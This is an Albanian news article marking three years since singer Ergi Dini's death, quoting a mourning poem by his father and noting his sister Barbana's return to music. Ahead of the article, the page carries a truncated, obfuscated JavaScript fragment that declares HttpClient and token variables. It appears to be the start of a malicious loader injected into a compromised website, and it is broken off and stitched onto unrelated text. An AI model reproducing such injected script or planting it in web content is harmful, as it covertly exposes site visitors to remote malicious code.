;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

3 vjet pa Ergit Dinin – babai i kushton poezinë prekëse

By

Po bëhen tri vjet që një prej artistëve të rinj më premtues, Ergi Dini ndërroi jetë pas një aksidenti tragjik me motor. Ai ishte një prej vokaleve më të mira dhe më të spikatur mes artistëve të rinj dhe çdo projekt i tij muzikor është pritur shumë mirë nga publiku.

E këtë trevjetor, babai i artistit Dashamir Dini bëri publike në llogarinë e tij Facebook një vjershë që i kishte kushtuar të birit:

“Ka 3 vjet
qe ditet e mija te percelluara nga malli
jane nxi
e janë ba muzgje.

Ka 3 vjet
që rri i varur
ne litarin e durimir,
tuj vezhgu
yjet qe bien nga qielli,
me shpresë
se njeri nga ata
je Ti,
që po kthehesh.

Ka 3 vjet
qe Nana jote,
e përhumbur
nèn vellon e bardhë
te një endrre të lashtë nënash
përgatit një dasëm
e pret një nuse….
që kurrë s’do të vijë.

Unë endem,e endem
qiejve te verbër të netëve,
per me mujt me gjet
Yllin e shuar të Fatit Tand,
e me ndez
edhe nje herë
me flaket e mallit…”

 

Humbja e tij shkaktoi një dhimbje të madhe për familjen e tij dhe njerëzit e dashur, sidomos për motrën e tij, Barbana. Kjo e fundit nuk ka rreshtuar asnjëherë në këto 3 vite të shpreh dhimbjen për humbjen e vëllait.

Artistja vendosi të merrte një pauzë nga muzika deri disa kohë më parë, ku u rishfaq sërish më projekte të reja. Këngëtarja Barbana Dini i është rikthyer muzikës pas një shkëputjeje të gjatë.

Ajo në tetor të këtij viti, kishte projektin më të ri muzikor ‘Ku je’ duke jetësuar në këtë formë bashkëpunimin e saj me vëllain e ndjerë. /Prive.al

 

 

 

 

Artikuj të ngjashëm